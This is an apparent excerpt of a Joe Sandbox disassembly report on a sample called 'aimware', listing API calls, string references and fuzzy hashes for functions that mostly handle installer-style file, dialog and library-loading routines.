Part of subcall function 00AC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00ABF2D8,Crypt32.dll,00000000,00ABF35C,?,?,00ABF33E,?,?,?), ref: 00AC0858

_swprintf.LIBCMT ref: 00AC0D4A
_swprintf.LIBCMT ref: 00AC0D96

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

AllocConsole.KERNEL32 ref: 00AC0D9E
GetCurrentProcessId.KERNEL32 ref: 00AC0DA8
AttachConsole.KERNEL32(00000000), ref: 00AC0DAF
_wcslen.LIBCMT ref: 00AC0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00AC0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00AC0DDC
Sleep.KERNEL32(00002710), ref: 00AC0DE7
FreeConsole.KERNEL32 ref: 00AC0DED
ExitProcess.KERNEL32 ref: 00AC0DF5

Strings

kernel32, xrefs: 00AC0873
SetDllDirectoryW, xrefs: 00AC0888
SetDefaultDllDirectories, xrefs: 00AC08B9
DXGIDebug.dll, xrefs: 00AC08FC, 00AC0C5E
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00AC0D84
uxtheme.dll, xrefs: 00AC0D17
dwmapi.dll, xrefs: 00AC0927, 00AC0D0D

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 51d6ed61e1edf6dbabb267c7a2c5d2828b5a727e849a25ac6e0b4b4a76a54d3d
Instruction ID: e91fd01ccc75fabe614c2ce484a5fcf9b631ff21093dbe17603778e82b675d49
Opcode Fuzzy Hash: 51d6ed61e1edf6dbabb267c7a2c5d2828b5a727e849a25ac6e0b4b4a76a54d3d
Instruction Fuzzy Hash: 27D150B24083C4EBDB21DF92898DF9FBAECAB85704F51491DF2859B150C7B48649CB62

Function 00ACC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00ACC744

Part of subcall function 00ACB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00ACB3FB

_wcslen.LIBCMT ref: 00ACCA0A
_wcslen.LIBCMT ref: 00ACCA13
SetWindowTextW.USER32(?,?), ref: 00ACCA71
_wcslen.LIBCMT ref: 00ACCAB3
_wcsrchr.LIBVCRUNTIME ref: 00ACCBFB
GetDlgItem.USER32(?,00000066), ref: 00ACCC36
SetWindowTextW.USER32(00000000,?), ref: 00ACCC46
SendMessageW.USER32(00000000,00000143,00000000,00AFA472), ref: 00ACCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ACCC7F

Strings

ProgramFilesDir, xrefs: 00ACCB45
<br>, xrefs: 00ACC9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 00ACCB1A
%s.%d.tmp, xrefs: 00ACC940

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 781026b02939ef9124c66be0ad7246061b9df04e1f9b82ea61b9507dedad2fa8
Instruction ID: 09b2f57cc5c4b7ecaf5036c57f5219067a0622545fbc12ef36a0ead0acbe7763
Opcode Fuzzy Hash: 781026b02939ef9124c66be0ad7246061b9df04e1f9b82ea61b9507dedad2fa8
Instruction Fuzzy Hash: F9E15372900259AADF24DBA0DD85FEE73BCAB04350F4580AAF609E7141EF749F858B61

Function 00ABDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ABDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00ABDAAC

Part of subcall function 00ABC29A: _wcslen.LIBCMT ref: 00ABC2A2

Part of subcall function 00AC05DA: _wcslen.LIBCMT ref: 00AC05E0

Part of subcall function 00AC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00ABBAE9,00000000,?,?,?,00010470), ref: 00AC1BA0

_wcslen.LIBCMT ref: 00ABDDE9
__fprintf_l.LIBCMT ref: 00ABDF1C

Strings

, xrefs: 00ABDD6C
*messages***, xrefs: 00ABDBC1
$%s:, xrefs: 00ABDEFF
R, xrefs: 00ABDC0C
RTL, xrefs: 00ABDEDE
*messages***, xrefs: 00ABDBFA
,, xrefs: 00ABDF57
@%s:, xrefs: 00ABDF06, 00ABDF12
a, xrefs: 00ABDC16

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 5e2c1adc83dadfb2450e44d97fbceca48554c8c14a59e3505aa399648a746f76
Instruction ID: 181f2faea2b0fe0f7fef18fa732080e1033903b5f48b07536eeeafe068ec69ba
Opcode Fuzzy Hash: 5e2c1adc83dadfb2450e44d97fbceca48554c8c14a59e3505aa399648a746f76
Instruction Fuzzy Hash: 2632D172900218EBDF24EF68C945BEA77B9FF14304F50456AF9069B282EBB1DD85CB50

Function 00ACD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ACB579
Part of subcall function 00ACB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACB58A
Part of subcall function 00ACB568: IsDialogMessageW.USER32(00010470,?), ref: 00ACB59E
Part of subcall function 00ACB568: TranslateMessage.USER32(?), ref: 00ACB5AC
Part of subcall function 00ACB568: DispatchMessageW.USER32(?), ref: 00ACB5B6

GetDlgItem.USER32(00000068,00B0FCB8), ref: 00ACD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00ACAF07,00000001,?,?,00ACB7B9,00AE506C,00B0FCB8,00B0FCB8,00001000,00000000,00000000), ref: 00ACD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00ACD51B
SendMessageW.USER32(00000000,000000C2,00000000,00AE35F4), ref: 00ACD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ACD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00ACD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ACD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00ACD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ACD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ACD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00AE43F4), ref: 00ACD5F0

Strings

\, xrefs: 00ACD549

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: a12ce5133e108779b0475fef0c968235e2927395aa1b55dd903279ca4a940a7b
Instruction ID: 221d5bd8be88e9e133a3da674e0782ada73a5531757e49c3a10a6af77eaf53e4
Opcode Fuzzy Hash: a12ce5133e108779b0475fef0c968235e2927395aa1b55dd903279ca4a940a7b
Instruction Fuzzy Hash: EA31EF71144342BFE301DF209C0AFAB7FECEB8AB05F004518F55197190EB668A05C776

Function 00ACD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00ACD7AE
ShellExecuteExW.SHELL32(?), ref: 00ACD8DE
ShowWindow.USER32(?,00000000), ref: 00ACD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00ACD959
CloseHandle.KERNEL32(?), ref: 00ACD97F
ShowWindow.USER32(?,00000001), ref: 00ACD9E1

Strings

.exe, xrefs: 00ACD989
.inf, xrefs: 00ACD89A

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 57ccddef2a8b677070145a24eb7675363497f09cb360e4f1a3bc57b15667ba77
Instruction ID: 5ae99e801b00cd255723e46878b9eb585a1ce6ed3811a476f214bc05285cdfc5
Opcode Fuzzy Hash: 57ccddef2a8b677070145a24eb7675363497f09cb360e4f1a3bc57b15667ba77
Instruction Fuzzy Hash: 2E51F475504380AAEB309F64D844FBBBBF4AF86744F06483EF5C197191EBB09985CB52

Function 00ADA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AD5695,00AD5695,?,?,?,00ADABAC,00000001,00000001,2DE85006), ref: 00ADA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00ADABAC,00000001,00000001,2DE85006,?,?,?), ref: 00ADAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00ADAB35
__freea.LIBCMT ref: 00ADAB42

Part of subcall function 00AD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00ADCA2C,00000000,?,00AD6CBE,?,00000008,?,00AD91E0,?,?,?), ref: 00AD8E38

__freea.LIBCMT ref: 00ADAB4B
__freea.LIBCMT ref: 00ADAB70

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 1c0d7689053abdd6fda67b757824bce6f999629cad96602ba0a3b1db6b2bca36
Instruction ID: 1a5e1afe39c9f33b52b1c243b509a4201be975f82cf9e94a9c46bd6488a3b635
Opcode Fuzzy Hash: 1c0d7689053abdd6fda67b757824bce6f999629cad96602ba0a3b1db6b2bca36
Instruction Fuzzy Hash: FC512572600216AFDB258F64CC81EBFB7AAEB64750F15462BFC06D7250EB74DC41C692

Function 00AD3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00AD3C35,?,?,00B12088,00000000,?,00AD3D60,00000004,InitializeCriticalSectionEx,00AE6394,InitializeCriticalSectionEx,00000000), ref: 00AD3C03

Strings

api-ms-, xrefs: 00AD3BC3

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 326f6b0308a4e6a821187a36d819df03f53cd06171004f75f9c4f813fda73e4e
Instruction ID: fa00e43a5013d82530e55d2f5eb32436100ec8a30f9b9c08b515d7238684517c
Opcode Fuzzy Hash: 326f6b0308a4e6a821187a36d819df03f53cd06171004f75f9c4f813fda73e4e
Instruction Fuzzy Hash: FD119437A45221ABCF218B589C8579D37649F11770F150113E916FB390E761EF008BD2

Function 00ACAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00AC0836
Part of subcall function 00AC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00ABF2D8,Crypt32.dll,00000000,00ABF35C,?,?,00ABF33E,?,?,?), ref: 00AC0858

OleInitialize.OLE32(00000000), ref: 00ACAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00ACAC66
SHGetMalloc.SHELL32(00AF8438), ref: 00ACAC70

Strings

riched20.dll, xrefs: 00ACAC1E
3Ro, xrefs: 00ACAC47

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 2774254ab9d21de2f0270135a87ab8e2e2160ab4c85e22c584cc60928dff621f
Instruction ID: ce81303f5b96ba2d7fc02fcba607da5f896c8aeb1fc48e2156abf4f8a8e1e9be
Opcode Fuzzy Hash: 2774254ab9d21de2f0270135a87ab8e2e2160ab4c85e22c584cc60928dff621f
Instruction Fuzzy Hash: 9BF0F9B5D00209ABCB10AFA9D949AEFFBFCEF94B00F40815AE515F2251DBB456058FA1

Function 00AB98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00AB7760,?,00000005,?,00000011), ref: 00AB995F
GetLastError.KERNEL32(?,?,00AB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00AB996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00AB7760,?,00000005,?), ref: 00AB99A2
GetLastError.KERNEL32(?,?,00AB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00AB99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00AB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00AB99F9

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 3655e070dd8777bfd6ef924b1a967cdb48fbbf9549d8e279867d721956cb7688
Instruction ID: 092480fdbf0e9b26ed028d5bbffd881caec835cb45cfb0f61f79e10d3ac55548
Opcode Fuzzy Hash: 3655e070dd8777bfd6ef924b1a967cdb48fbbf9549d8e279867d721956cb7688
Instruction Fuzzy Hash: 79312731544385AFE730DF24CD85BDBBBA8BB04320F200B1DF6A1961E2D3B4A955CB91

Function 00ACB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ACB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACB58A
IsDialogMessageW.USER32(00010470,?), ref: 00ACB59E
TranslateMessage.USER32(?), ref: 00ACB5AC
DispatchMessageW.USER32(?), ref: 00ACB5B6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 01d93ffd5894ad154ad96548fe5a29b6735427d245d9337e98b832ce395bc1f8
Instruction ID: fbb55863f4a0a29ece440a874b0bad9452480b70469ae13a6e106238a266fbcd
Opcode Fuzzy Hash: 01d93ffd5894ad154ad96548fe5a29b6735427d245d9337e98b832ce395bc1f8
Instruction Fuzzy Hash: A9F06D71A0111AAB8B209BE59C4DEEB7FECEE056917418415B51AE3050FF78D605CBB0

Function 00ACABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00ACABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00ACABF9

Part of subcall function 00AC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00ABC116,00000000,.exe,?,?,00000800,?,?,?,00AC8E3C), ref: 00AC1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00ACABE9

Strings

EDIT, xrefs: 00ACABCD, 00ACABD8, 00ACABE5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: a850036e5996da289a23a41c6e15c53ef90b63636cf8a8bb002167136f8da609
Instruction ID: ceeba4a8635fd64fffc4842a826de867a66512fffefc9f80e2777bb5cd09bc8b
Opcode Fuzzy Hash: a850036e5996da289a23a41c6e15c53ef90b63636cf8a8bb002167136f8da609
Instruction Fuzzy Hash: 03F0823670022876DB2097259C09FEB76EC9B4AF40F494029BA05E3180EB60DE4186B6

Function 00AB9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AB9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00AB97AD
GetLastError.KERNEL32 ref: 00AB97DF
GetLastError.KERNEL32 ref: 00AB97FE

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5fb937d5ce37ac9f869508c517dbe7fe05aac04e8eb6f6d00b7c2d169c7490be
Instruction ID: 36450eb24d0c8250f9b6785d9e13d1dea73c91f17707298c9c541737a76c99c6
Opcode Fuzzy Hash: 5fb937d5ce37ac9f869508c517dbe7fe05aac04e8eb6f6d00b7c2d169c7490be
Instruction Fuzzy Hash: C0118631510614EBDF209FA5C8446EB3BBDFB46320F108926F61A86192DB759E84DB61

Function 00ADAD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AD3F73,00000000,00000000,?,00ADACDB,00AD3F73,00000000,00000000,00000000,?,00ADAED8,00000006,FlsSetValue), ref: 00ADAD66
GetLastError.KERNEL32(?,00ADACDB,00AD3F73,00000000,00000000,00000000,?,00ADAED8,00000006,FlsSetValue,00AE7970,FlsSetValue,00000000,00000364,?,00AD98B7), ref: 00ADAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00ADACDB,00AD3F73,00000000,00000000,00000000,?,00ADAED8,00000006,FlsSetValue,00AE7970,FlsSetValue,00000000), ref: 00ADAD80

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ca077f5247cc12680e1ac09b4b25a00657fd540f72c3135803480a2a551e9303
Instruction ID: 08c8447ad0748792d84d90933c706a52fb119b5f15ab59a162454775c8f299ae
Opcode Fuzzy Hash: ca077f5247cc12680e1ac09b4b25a00657fd540f72c3135803480a2a551e9303
Instruction Fuzzy Hash: 4501FC36201226ABCB218FB89C88B977B69EF357627110621F987D7750D730D901CBE1

Function 00AB9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

